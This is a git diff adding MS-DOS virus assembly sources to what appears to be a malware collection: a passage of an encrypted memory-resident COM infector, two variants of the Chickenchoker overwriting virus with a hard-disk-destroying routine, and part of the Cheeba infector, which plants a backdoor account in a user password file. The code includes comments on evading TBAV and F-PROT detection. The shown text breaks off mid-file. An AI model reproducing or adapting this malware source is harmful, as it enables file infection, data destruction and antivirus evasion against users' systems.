there is a Section Header entry + ; it will load that section or as + ; many sections as there are entries + ; in other words it loads till + ; the next section header is 0000h + ; or it has load the NumSect + +TimeDate dd 6f052098h +PtrSymTble dd 00000000h +Numsymbols dd 00000000h +SizeOpHder dw 00e0h +Char dw 818eh + +Magic dw 010bh +LinkerVer dw 1902h +SiZeOfCOde dd offset CodeEnds - offset PEheader + +SizeOfInitData dd 00003000h +SizeOfUnintdata dd 000000000 + +EntryPoint dd offset Begin - offset PEheader + LoadAT +BaseCode dd 00400000h +BaseData dd 00400000h + +ImageBase dd 00400000h +SectionAlign dd 00001000h +FileAlign dd 00000200h + +OsMajor dw 0001h +Osminor dw 0000h +UseMajor dw 0000h +UseMinor dw 0000h +SubSysMajor dw 0003h +SubSysMinor dw 000Ah + dw 0000h + dw 0 +ImageSize dd 00010000h +HeaderSize dd offset CDseg - offset PEheader +FileCheck dd 0h ;checksum +Subsystem dw 0002h +DllFlag dw 0000h +StackRes dd 00100000h +StackComm dd 00002000h ;60 +HeapRes dd 00100000h +Heapcomm dd 00001000h +LoaderFlag dd 00000000h + +NumberRVA dd 00000010h ;:-D he he he! +; +CODE SEGMENT + + .286c + ASSUME CS:CODE, DS:CODE, ES:CODE + ORG 100h + +START: + JMP COMIENZO + NOP + NOP + NOP + INT 20h + +COMIENZO: +ONE LABEL BYTE + INT 03h ; This piece o'shit's for TBAV :( ::: + MOV BX,0107h + PUSH BX + MOV AH,0Dh ; ??? What?????????! + MOV CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE) + MOV SI,(OFFSET DESDE_ACA - OFFSET ONE) + ADD SI,BX +DESENCRIPTO: + MOV DL,CS:[((NUMERO - OFFSET ONE) + BX)] + XOR [SI],DL + INC SI + XOR AH,AH ; This shit's for F-PROT + INT 02h ; This shit's for TBAV + LOOP DESENCRIPTO + + JMP DESDE_ACA + INT 21h + + MOV AX,4C00h + INT 21h + +DESDE_ACA: + MOV AX,0CACAh + INT 21h + CMP AX,0FEDEh + JE CORRE_PROG_1 + JMP CHUPAMELA +CORRE_PROG_1: + JMP CORRE_PROG + +CHUPAMELA: + PUSH AX + PUSH DX + MOV AX,0FA01h + MOV DX,5945h + INT 21h + POP DX + POP AX + + MOV AH,4Ah + XOR BX,BX + INT 21h + + MOV AH,4Ah + MOV BX,0FFFFh + INT 21h + + SUB BX,101h + MOV AH,4Ah + INT 21h + + MOV AH,48h + MOV BX,100h + INT 21h + + MOV ES,AX + PUSH ES + DEC AX + MOV ES,AX + MOV ES:WORD PTR [0001h], 0008h + POP ES + + PUSH CS + POP DS + + POP SI + PUSH SI + XOR DI,DI + MOV CX,OFFSET TWO - OFFSET ONE + CLD + REP MOVSB + + PUSH ES + POP DS + + MOV AX,3521h + INT 21h + POP SI + PUSH SI + MOV DS:[INT21IP - OFFSET ONE],BX + MOV DS:[INT21CS - OFFSET ONE],ES + + MOV AX,2521h + MOV DX,(OFFSET HOOK_21 - OFFSET ONE) + INT 21h + + MOV AH,04h + INT 1Ah + CMP DX,0526h + JE JODE_2 + CMP DX,1126h + JE JODE_2 + CMP DX,1021h + JE JODE_2 + JMP NO_JODE +JODE_2: + MOV AX,3513h + INT 21h + MOV DS:[INT17IP - OFFSET ONE],BX + MOV DS:[INT17CS - OFFSET ONE],ES + + MOV AX,2513h + MOV DX,(OFFSET HOOK_13 - OFFSET ONE) + INT 21h +NO_JODE: + PUSH CS + PUSH CS + POP DS + POP ES + +CORRE_PROG: + POP BX + + MOV DI,100h + LEA SI,[(NORMAL - OFFSET ONE) + BX] + MOVSW + MOVSB + + PUSH CS + PUSH 0100h + RETF + +HOOK_21 PROC FAR + PUSH DS + PUSHF + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH DS + PUSH ES + + CMP AX,0CACAh + JE RESIDE + CMP AH,4Bh + JE INFECTA1 + CMP AH,3Dh + JE INFECT_FAST1 + CMP AH,4Eh + JE NO_NC + CMP AH,4Fh + JE NO_NC + CMP AH, 11h + JE NO_DIR + CMP AH, 12h + JE NO_DIR + JMP FIN + +INFECTA1: JMP INFECTA +INFECT_FAST1: JMP INFECT_FAST +RESIDE: + POP ES + POP DS + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + + POPF + POP DS + MOV AX,0FEDEh + IRET + +NO_DIR PROC + POP ES + POP DS + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POPF + POP DS + + PUSH CX + PUSH BX + PUSH ES + + PUSH AX + MOV AH,2Fh + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + POP AX + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + PUSH AX + PUSHF + OR AL,AL + JNE FINHANDLER2 + CMP BYTE PTR ES:[BX],0FFh + JNE NOEXTENDED + ADD BX,07h + +NOEXTENDED: + MOV CX,ES:[BX+17h] + AND CL,00011111b + CMP CL,00001101b + JNE FINHANDLER2 + SUB WORD PTR ES:[BX+1Dh],OFFSET TWO - OFFSET ONE ;LE RESTO EL VALOR DEL PRG + SBB WORD PTR ES:[BX+1Fh],0 +FINHANDLER2: + POPF + POP AX + POP ES + POP BX + POP CX + RETF 0002h +NO_DIR ENDP + +NO_NC PROC + POP ES + POP DS + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POPF + POP DS + + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + PUSHF + PUSH AX + PUSH BX + PUSH CX + PUSH ES + + MOV AH,2Fh + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV CX,ES:[BX+16h] + AND CL,00011111b + CMP CL,00001101b + JE SI_RECUBRO + JMP NO_RECUBRO + +SI_RECUBRO: + SUB WORD PTR ES:[BX+1Ah],OFFSET TWO - OFFSET ONE ;LE RESTO EL VALOR DEL PRG + +NO_RECUBRO: + POP ES + POP CX + POP BX + POP AX + POPF + RETF 2 +NO_NC ENDP + +FIN_1: JMP FIN + +INFECT_FAST: + MOV SI,DX +BUCLE: + CMP BYTE PTR [SI],"." + JE YASTA + CMP BYTE PTR [SI],00h + JE FIN_1 + INC SI + JMP BUCLE +YASTA: + PUSH SI +BUCLE2: + CMP BYTE PTR [SI],"\" + JE YASTA2 + CMP SI,DX + JNE NOSTA2 + DEC SI + JMP YASTA2 +NOSTA2: + DEC SI + JMP BUCLE2 +YASTA2: + INC SI + MOV AX,[SI] + OR AX,2020h + CMP AX,"oc" + JNE DALEPUES + INC SI + INC SI + MOV AX,[SI] + OR AX,2020h + CMP AX,"mm" + JNE DALEPUES + POP SI + JMP FIN_1 + +DALEPUES: + POP SI + INC SI + MOV AX,[SI] + OR AX,2020h + CMP AX,"oc" + JNE FIN_1 + +INFECTA: + PUSH AX + PUSH BX + PUSH DX + PUSH DS + PUSH ES + + MOV AX, CS + MOV DS, AX + MOV AX,3524h + PUSHF + CALL DWORD PTR DS:[INT21IP - OFFSET ONE] + MOV DS:[INT24IP - OFFSET ONE],BX + MOV DS:[INT24CS - OFFSET ONE],ES + + MOV AX,2524h + MOV DX,(OFFSET HOOK_24 - OFFSET ONE) + PUSHF + CALL DWORD PTR DS:[INT21IP - OFFSET ONE] + POP ES + POP DS + POP DX + POP BX + POP AX + + PUSH DX + PUSH DX + + CALL REMUEVE_BITS + + POP DX + MOV AX,4300h + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + MOV CS:[(ATRIBUTOS - OFFSET ONE)],CX + + MOV AX,4301h + MOV CX,20h + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + JC FINAL_1 + + MOV AX,3D02h + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + PUSH AX + POP BX + + MOV AH,3Fh + MOV CX,2 + PUSH CS + POP DS + MOV DX,(OFFSET NORMAL - OFFSET ONE) + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + XOR SI,SI + MOV AL,CS:(NORMAL - OFFSET ONE)[SI] + CMP AL,'M' + JE FINAL_1 + INC SI + MOV AL,CS:(NORMAL - OFFSET ONE)[SI] + CMP AL,'Z' + JE FINAL_1 + JMP CONTI +FINAL_1: + JMP FINAL + +CONTI: + MOV AX,5700h + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + MOV CS:[(HORA - OFFSET ONE)],CX + MOV CS:[(FECHA - OFFSET ONE)],DX + + AND CL,00011111b ; Esto es lo correcto para comprobar + CMP CL,00001101b ; si los segundos son 26 + JE FINAL_1 + + MOV AX,4200h + CWD + MOV CX,DX + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV AH,3Fh + MOV CX,3 + PUSH CS + POP DS + MOV DX,(OFFSET NORMAL - OFFSET ONE) + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV AX,4202h + CWD + MOV CX,DX + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + PUSH AX + + SUB AX,3 + + MOV SI,1 + MOV CS:(BUFFER - OFFSET ONE)[SI],AL + INC SI + MOV CS:(BUFFER - OFFSET ONE)[SI],AH + +; PUSH AX ;MIERDA1 + + MOV AH,2Ch + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + MOV CS:[NUMERO - OFFSET ONE],DL + + PUSH BX + MOV AH,48h + MOV BX,150h + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + MOV ES,AX + POP BX + + PUSH CS + POP DS + + XOR SI,SI + MOV DI,SI + MOV CX,OFFSET TWO - OFFSET ONE + CLD + REP MOVSB + + PUSH ES + POP DS + + POP AX ;LL + INC AH + XOR SI,SI ;LL + MOV ES:[SI + 2],AL ;OPA + MOV ES:[SI + 3],AH + + MOV CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE) + MOV SI,(OFFSET DESDE_ACA - OFFSET ONE) +ENCRIPTO: + XOR [SI],DL + INC SI + LOOP ENCRIPTO + + MOV AH,40h + MOV CX,OFFSET TWO - OFFSET ONE + XOR DX,DX + PUSH ES + POP DS + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + JC FINAL + + MOV AH,49h + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV AX,4200h + CWD + MOV CX,DX + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV AH,40h + MOV CX,3 + MOV DX,(OFFSET BUFFER - OFFSET ONE) + PUSH CS + POP DS + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV AX,5701h + MOV CX,CS:[(HORA - OFFSET ONE)] + AND CL,11100000b + OR CL,00001101b + MOV DX,CS:[(FECHA - OFFSET ONE)] + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] +FINAL: + MOV AH,3Eh + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV AX,4301h + MOV CX,CS:[(ATRIBUTOS - OFFSET ONE)] + POP DX + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + CALL RESTAURA_BITS + + MOV AX,2524h + MOV DX,CS:[INT24IP - OFFSET ONE] + MOV DS,CS:[INT24CS - OFFSET ONE] + PUSHF + CALL DWORD PTR CS:[INT21IP-OFFSET ONE] + +FIN: + POP ES + POP DS + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + + POPF + POP DS + JMP DWORD PTR CS:[(INT21IP - OFFSET ONE)] +HOOK_21 ENDP + +HOOK_13 PROC + PUSHF + PUSH AX + PUSH BX + PUSH CX + PUSH SI + XOR BX,BX + MOV SI,31 + MOV CX,75 +ESCRIBE: + MOV AH,0Eh + MOV AL,CS:(TEXTO - OFFSET ONE)[SI] + INT 10h + INC SI + LOOP ESCRIBE + POP SI + POP CX + POP BX + POP AX + POPF + JMP DWORD PTR CS:[(INT17IP - OFFSET ONE)] +HOOK_13 ENDP + +HOOK_24 PROC + XOR AL,AL + IRET +HOOK_24 ENDP + +V_SAFE PROC + MOV AH,0FAh + MOV DX,5945h + INT 21h + RET +V_SAFE ENDP + +VERIFICA_RESIDENCIA PROC + XOR AL,AL + CALL V_SAFE + CMP BX,2F00h + JE FORI + STC +FORI: RET +VERIFICA_RESIDENCIA ENDP + +REMUEVE_BITS PROC + CALL VERIFICA_RESIDENCIA + JC FORI_1 + MOV AL,02h + MOV BL,00000000b + CALL V_SAFE + MOV CS:[SEBA-OFFSET ONE],CL +FORI_1: + CLC + RET +REMUEVE_BITS ENDP + +RESTAURA_BITS PROC + CALL VERIFICA_RESIDENCIA + JC FORI_2 + MOV AL,02 + MOV BL,CS:[SEBA-OFFSET ONE] + CALL V_SAFE +FORI_2: + CLC + RET +RESTAURA_BITS ENDP + +INT21IP DW 0 +INT21CS DW 0 +INT24IP DW 0 +INT24CS DW 0 +INT17IP DW 0 +INT17CS DW 0 +ATRIBUTOS DW 0 +SEBA DB 1 +HORA DW 0 +FECHA DW 0 +BUFFER DB 3 DUP(0E9h) +NORMAL DB 3 DUP(90h) +TEXTO DB "VIRUS LOS SALIERIS DE CHARLY 2." + DB "AIN'T A HACKER," + DB "AIN'T A CRACKER," + DB "I AM ONLY A MOTHERFUCKER." + DB 'DEDICATED TO "MACA"' +INCRIPT LABEL BYTE +NUMERO DB 1 DUP(0) + +TWO LABEL BYTE + +CODE ENDS +END START \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.chc.asm b/MSDOS/Virus.MSDOS.Unknown.chc.asm new file mode 100644 index 00000000..d40abeaa --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.chc.asm @@ -0,0 +1,87 @@ +; Chickenchoker Virus by HDKiller +; +; Origianl Variant 127 bytes +; Fixored up Variant 132 bytes +; +; +; This is a trivial variant of a basic sort, no encryption and a nasty payload +; +; Being HDKiller's first virus it wasnt a bad start, though I wouldnt have made +; it destructive. +; +; The original version of this virus raised 2 flags in TBAV FS, one for file +; access and one for com/exe search routine. The S is defeated by changing the +; original *.com with a *.?om wich is functionally the same but will cause the +; the virus to attack .aom .bom .com etc... This makes the virus a little more +; unstable, bet hey it's trivial. The F is caused by mov ah,40h and can be +; beaten any number of ways, I used a mov ah,00h then an xor ah, 40h. Thats +; one of countless numbers of way to get 40h into ah. TBAV was keying on the +; beginning of this virus to get it's determination that it's a trivial virus. +; By adding a few lines of code you effectively loose TBAV. +; +Code Segment + Assume CS:code,DS:code + Org 100h + +startvx proc near + + mov ah,4eh +; mov cx,0000h ; Key point for TBAV + mov cx,0013h +lopht: ; Quick and simple loop to confuse TBAV + loop lopht ; Now that didnt take much did it ?? + mov dx,offset star_com + int 21h + + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + + xchg bx,ax + +; mov ah,40h ; Sets off the F in TBAV + xor ah,ah ; One of many methods to get 40h into + xor ah,40h ; ah. Be imaginative when you can :) + mov cx,offset endvx - offset startvx + mov dx,offset startvx + int 21h + + mov ah,3eh + int 21h + + int 20h + +szTitleName db' Chickenchoker Virus by hdkiller has been activated' +;szTitleName db' ChChickenchchoker Virus by hdkiller | SOK-3' + +rip_hd: + + xor dx,dx +rip_hd1: + mov cx,2 + mov ax,311h + mov dl,80h + mov bx,5000h + mov es,bx + int 13h + jae rip_hd2 + xor ah,ah + int 13h + rip_hd2: + inc dh + cmp dh,4 + jb rip_hd1 + inc ch + jmp rip_hd + +startvx endp + +;star_com: db "*.com",0 ; Sets off S in TBAV +star_com: db "*.?om",0 ; Sacrifice a little stability to loose + ; the S flag + +endvx label near + +code ends + end startvx diff --git a/MSDOS/Virus.MSDOS.Unknown.chchoke.asm b/MSDOS/Virus.MSDOS.Unknown.chchoke.asm new file mode 100644 index 00000000..ac326e50 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.chchoke.asm @@ -0,0 +1,58 @@ +Code Segment + Assume CS:code,DS:code + Org 100h + +startvx proc near + + mov ah,4eh + mov cx,0000h + mov dx,offset star_com + int 21h + + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + + xchg bx,ax + + mov ah,40h + mov cx,offset endvx - offset startvx + mov dx,offset startvx + int 21h + + mov ah,3eh + int 21h + + int 20h + +szTitleName db' Chickenchoker Virus by hdkiller has been activated' + +rip_hd: + + xor dx,dx +rip_hd1: + mov cx,2 + mov ax,311h + mov dl,80h + mov bx,5000h + mov es,bx + int 13h + jae rip_hd2 + xor ah,ah + int 13h + rip_hd2: + inc dh + cmp dh,4 + jb rip_hd1 + inc ch + jmp rip_hd + +startvx endp + +star_com: db "*.com",0 + +endvx label near + +code ends + end startvx \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cheeba.asm b/MSDOS/Virus.MSDOS.Unknown.cheeba.asm new file mode 100644 index 00000000..d2f9bf8d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cheeba.asm @@ -0,0 +1,857 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +;*** The author of Cheeba let his source lie around --- so HERE IT IS!!! *** +; Btw just one thing --- I give it 2 you as long as you don't make a +; sucking destroying thing... Btw 2 this is of course only educational... +;----------------------------------------------------------------------------- +; Naam en password staan +- op lijn 200. Verander de low-version number +; bij de verschillende versies... +; Verander verder NIKS aan het virus !!! + +Com_First: push cs +S_1: mov ax,100h +S_2: push ax + mov ax,cs +CodePars: add ax,0 + push ax +S_3: mov ax,offset End_Virus +S_4: push ax + retf + +VirTitle db 'CHEEBA Makes Ya High Harmlessly-1.2 F**K THE LAMERS' + +I21Hooks db 0 + dw offset Stop_Prg + db 31h + dw offset Stop_Prg + db 4Ch + dw offset Stop_Prg + db 4Bh + dw offset Start_Prg + db 45h + dw offset Check_Init + db 3Ch + dw offset Open_Wrt + db 3Dh + dw offset Open_Rd + db 3Eh + dw offset Check_Close + db 40h + dw offset Check_Vir + +New_21: call Rest_Orig_21 + call Save_Regs + cld + mov bx,offset I21Hooks +Srch_Fct_Lp: cmp ah,[bx] + jne Wrong_Fct + push [bx+1] + call Retr_Regs + ret +Wrong_Fct: add bx,3 + cmp bx,offset New_21 + jb Srch_Fct_Lp + +Go_Dos: call Retr_Regs + call Call_Dos +Skip_21: call Rest_21_Jmp + retf 2 + +Call_Dos: pushf + db 09Ah +Org_21_Addr dw 2 dup (?) + ret + +Org_21_Code db 5 dup (?) + +;*** Fct 45 - check init *** + +Check_Init: cmp bx,0D15h + jne Go_Dos + mov bx,0F0Ch + jmp short Skip_21 + +;*** I21 FCT 3Dh - Open file for read *** + +Open_Rd: test al,3 + jz Go_Dos + xchg si,dx +Get_0: lodsb + or al,al + jnz Get_0 + mov cx,0Ah + xor bx,bx + xor ax,ax + cwd ; Dx = 0 +Get_CSum: dec si + rol bx,1 + mov al,[si] + or al,20h + xor bl,al + add dx,ax + loop Get_CSum + cmp bx,1AE7h + jne Go_Dos + cmp dx,3B7h + jne Go_Dos + +Is_Users: mov word ptr cs:[Save_A_Reg],si + mov di,offset Coded +Del_Si: mov si,word ptr cs:[Save_A_Reg] +Lp_Unc: lodsb + or al,al + jz Del_Si + or al,20h + sub byte ptr cs:[di],al + inc di + cmp di,offset No_Read + jb Lp_Unc + +Coded: call Retr_Regs + and al,0FEh + or al,2 + call Call_Dos + jnc Has_Read + jmp No_Read +Has_Read: pushf + call Save_Regs + xchg bx,ax + mov ah,3Fh + mov cx,9Eh + mov dx,offset End_Virus + call Call_Dos + mov dx,[End_Virus+20h] + mov cx,[End_Virus+22h] + or cx,cx + jnz Test_Ok + or dx,dx + jz No_XS_YET + +Test_Ok: mov ax,4200h + call Call_Dos + mov ah,3Fh + mov dx,offset End_Virus+9Eh + mov cx,9Eh + call Call_Dos + cmp ax,cx + jnz No_XS_YET + cmp byte ptr [End_Virus+9Eh],3 + jne No_XS_YET + test byte ptr [End_Virus+9Eh+77h],1 + jnz No_XS_YET + mov ax,[End_Virus+84h] + cmp ax,[End_Virus+9Eh+84h] + jne No_XS_YET +J_Less: jmp Less_Users + +No_XS_Yet: mov ax,4202h + xor cx,cx + cwd ; Dx = 0 + call Call_Dos + or dx,dx + jnz More_Users + cmp ax,9Eh*50 ; 50 users of meer + jb J_Less + +More_Users: mov cx,9Eh + div cx + or dx,dx + jnz J_Less + shr ax,1 + mul cx + xchg cx,dx + xchg dx,ax + mov ax,4200h + call Call_Dos +Read_Lp: mov ah,3Fh + mov dx,offset End_Virus+9Eh + mov cx,9Eh + call Call_Dos + cmp ax,cx + jne Less_Users + test byte ptr [offset End_Virus+9Eh+77h],1 ; Search deleted + je Read_Lp + mov ax,4201h + mov cx,-1 + mov dx,-9Eh + call Call_Dos + push dx + push ax + mov [End_Virus+20h],ax + mov [End_Virus+22h],dx + mov ax,4200h + xor cx,cx + cwd ; dx = 0 + call Call_Dos + mov ah,40h + mov cx,9Eh + mov dx,offset End_Virus + call Call_Dos + mov ax,4200h + pop dx + pop cx + call Call_Dos + push ds + pop es + mov al,0 + mov di,offset End_Virus + mov cx,106h-9Eh + repz stosb + mov ax,2020h + mov cx,5 +Wrt_20s: inc di + stosw + loop Wrt_20s + +;HIER STAAN NAAM EN PASSWORD. +; Naam en password zijn 3 chars, Name = , Password = +; Zijn dus Name = 1F 20 7E, Password = 4D 5A B8 +; Staan zoals hier: +; +; mov ..., 0 +; ..... 0 +; Password: +; ..... ,0 +; ..... ,0 +; + mov word ptr [End_Virus],01F03h + mov word ptr [End_Virus+2],07E20h + mov word ptr [End_Virus+3Eh],04D03h + mov word ptr [End_Virus+40h],0B85Ah + + + mov ah,40h + mov cx,9Eh + mov dx,offset End_Virus + call Call_Dos + +Less_Users: call Go_Beg_File + popf + call Retr_Regs +No_Read: pushf + push ax + push si + push di + push ds + mov di,offset Coded +Del_Si_2: mov si,word ptr cs:[Save_A_Reg] +Lp_Unc_2: lodsb + or al,al + jz Del_Si_2 + or al,20h + add byte ptr cs:[di],al + inc di + cmp di,offset No_Read + jb Lp_Unc_2 + + pop ds + pop di + pop si + pop ax + popf + + call Rest_21_Jmp + retf 2 + +;*** I 21 FCT 3C - Rewrite file *** + +Open_Wrt: cld + test byte ptr cs:[Flags],1 ; Already sure-exec opened? + jnz J_JD_2 + + push ds + pop es + xchg di,dx + mov al,0 + mov cx,-1 + repnz scasb + mov ax,[di-5] + or ax,2020h + cmp ax,'c.' + jne No_Com + mov ax,[di-3] + or ax,2020h + cmp ax,'mo' + jne Open_It +Sure_Exec: or byte ptr cs:[Flags],1 +Open_It: call Retr_Regs + call Call_Dos + jc Not_Opened + mov word ptr cs:[Exec_Handle],ax +Not_Opened: call Rest_21_Jmp + retf 2 + +No_Com: cmp ax,'e.' ; '.E'? + jne Open_It + + mov ax,[di-3] + or ax,2020h + cmp ax,'ex' ; .. 'XE'? + je Sure_Exec +OJ_2: jmp short Open_It + +;*** I21 FCT 3E - Infect on close if orig. prog has written too *** + +Check_Close: push cs + pop ds + cmp bx,[Exec_Handle] ; Same file? +J_JD_2: jne JD_2 + mov word ptr [Exec_Handle],0FFFFh ; Don't follow anymore + call Go_Beg_File ; Go to beg. of file + mov ah,3Fh ; Read first bytes + mov cx,18h + mov dx,offset Read_Buf + call Call_Dos + and byte ptr [Flags],0FBh ; Flag for COM + cmp word ptr [Read_Buf],'ZM' ; MZ - Exe? + je Infect_Exe + test byte ptr [Flags],1 ; Sure exec? + jnz Infect_Com + and byte ptr cs:[Flags],0FEh +JD_2: jmp Go_Dos + +Infect_Exe: or byte ptr [Flags],4 ; Flag for EXE + mov ax,[Read_Buf+16h] + mov [Exe_CS+1],ax + mov ax,[Read_Buf+14h] + mov [Exe_IP+1],ax + cmp ax,offset Init + je OJ_2 + mov ax,[Read_Buf+0Eh] + mov [Exe_SS+1],ax + mov ax,[Read_Buf+10h] + mov [Exe_SP+1],ax +Infect_Com: and byte ptr [Flags],0FEh + cmp word ptr [Read_Buf],0B80Eh + je JD_2 + cmp word ptr [Read_Buf],0BFh + je JD_2 + +Not_Inf: mov ax,4202h ; Go to end of file + xor cx,cx + cwd ; Dx = 0 + call Call_Dos + + test byte ptr [Flags],4 + jz No_Ovl_Test + + push ax ; .EXE: Test for internal overlays + push dx + mov cx,200h + div cx + cmp dx,[Read_Buf+2] + jne Is_Ovl + or dx,dx + jz No_Corr_Chk + inc ax +No_Corr_Chk: cmp ax,[Read_Buf+4] +Is_Ovl: pop dx + pop ax + je No_Ovl_Test + +JD_3: jmp short JD_2 + +No_Ovl_Test: add ax,0Fh ; End in paragraphs + adc dx,0 + and ax,0FFF0h + + mov Org_Fl_Len_Lo,ax + mov Org_Fl_Len_Hi,dx + + push ax + mov cl,4 + shr ax,cl + mov [CodePars+1],ax + or al,al + jnz No_Al_0 + dec al +No_Al_0: mov byte ptr [offset S_5-1],al + pop ax + + push ax + push dx + + mov cx,dx ; Go to end-in-paragraphs + mov dx,ax + mov ax,4200h + call Call_Dos + + push cs + pop es + mov si,100h + mov di,offset End_Virus + mov cx,offset End_Virus-100h + mov dl,byte ptr cs:[offset S_5-1] +Code_Lp: lodsb + cmp si,offset Init + ja No_Code + xor al,dl +No_Code: stosb + loop Code_Lp + + mov ax,5700h + call Call_Dos + mov Org_Fl_Time,cx + mov Org_Fl_Date,dx + + mov ah,40h ; Write virus behind program + mov cx,offset End_Virus-100h + mov dx,offset End_Virus + call Call_Dos + + call Go_Beg_File + + mov dx,offset Com_First + mov cx,10h + + pop si + pop ax + + test byte ptr [Flags],4 + jz Init_Com + + mov dx,si + mov cx,4 +Get_CS: shr dx,1 + rcr ax,1 + loop Get_CS + + sub ax,[Read_Buf+8] ; - header size + sub ax,10h + mov [Read_Buf+16h],ax + mov [Read_Buf+0Eh],ax + mov word ptr [Read_Buf+14h],offset Init + mov word ptr [Read_Buf+10h],offset End_Virus+100h + + mov ax,Org_Fl_Len_Lo + mov dx,Org_Fl_Len_Hi + + add ax,offset End_Virus-100h + adc dx,0 + mov cx,200h + div cx + or dx,dx + jz No_Corr + inc ax +No_Corr: mov [Read_Buf+2],dx + mov [Read_Buf+4],ax + mov dx,offset Read_Buf + mov cx,18h + +Init_Com: mov ah,40h + call Call_Dos + + mov ax,5701h + mov cx,Org_Fl_Time + mov dx,Org_Fl_Date + call Call_Dos + +JD_4: jmp short JD_3 + + +;*** 00 / 31 / 4C: End program *** + +Stop_Prg: push ds + push bx + lds bx,cs:[Jmp_22+1] + cli + mov byte ptr [bx],0EAh + mov word ptr [bx+1],offset Int_22 + mov word ptr [bx+3],cs + sti + pop bx + pop ds + jmp short JD_4 + +Int_22: call Rest_21_Jmp + push cs + pop ds + les di,dword ptr [Jmp_22+1] + mov si,offset Org_22 + call Move_Bytes + call Retr_Regs +Jmp_22: jmp 0:0 + +Org_22 db 5 dup (?) + +;*** Start prog *** + +Start_Prg: lds bx,cs:[Jmp_13+1] + cli + mov byte ptr [bx],0EAh + mov word ptr [bx+1],offset Int_13 + mov word ptr [bx+3],cs + sti + call Retr_Regs +JD_5: jmp short JD_4 + +Int_13: call Rest_21_Jmp + push si + push di + push ds + push es + push cs + pop ds + les di,dword ptr [Jmp_13+1] + mov si,offset Org_13 + call Move_Bytes + pop es + pop ds + pop di + pop si +Jmp_13: jmp 0:0 + +Org_13 db 5 dup (?) + +;*** Check for string 'iru' (vIRUs) *** + +Check_Vir: cmp bx,cs:[Exec_Handle] + jne No_Vir + sub cx,2 + jc No_Vir + push ds + pop es + mov di,dx + mov al,'i' +Iru_Lp: repnz scasb + jnz No_Vir + cmp word ptr [di],'ur' + jne Iru_Lp + mov word ptr cs:[Exec_Handle],0FFFFh + and byte ptr cs:[Flags],0FEh +No_Vir: jmp short JD_5 + + +Move_Bytes: cli + cld + movsw + movsw + movsb + sti + ret + +Rest_Orig_21: push si + push di + push ds + push es + push cs + pop ds + mov si,offset Org_21_Code + les di,dword ptr [Org_21_Addr] + call Move_Bytes + pop es + pop ds + pop di + pop si + ret + +Rest_21_Jmp: push ds + push bx + lds bx,dword ptr cs:[Org_21_Addr] + cli + mov byte ptr [bx],0EAh + mov word ptr [bx+1],offset New_21 + mov word ptr [bx+3],cs + sti + pop bx + pop ds + ret + +;*** Proc: Save regs *** + +Save_Regs: mov word ptr cs:[Save_Ds],ds + push cs + pop ds + mov word ptr [Save_Ax],ax + mov word ptr [Save_Bx],bx + mov word ptr [Save_Cx],cx + mov word ptr [Save_Dx],dx + mov word ptr [Save_Si],si + mov word ptr [Save_Di],di + mov word ptr [Save_Es],es + ret + +Retr_Regs: push cs + pop ds + mov ax,word ptr [Save_Ax] + mov bx,word ptr [Save_Bx] + mov cx,word ptr [Save_Cx] + mov dx,word ptr [Save_Dx] + mov si,word ptr [Save_Si] + mov di,word ptr [Save_Di] + mov es,word ptr [Save_Es] + mov ds,word ptr [Save_Ds] + ret + +Go_Beg_File: mov ax,4200h + xor cx,cx + cwd ; dx = 0 + call Call_Dos + ret + +Exec_Handle dw 0FFFFh ; Handle of opened-with-write- exec. file + +Flags db (?) ; Flags: 1 = 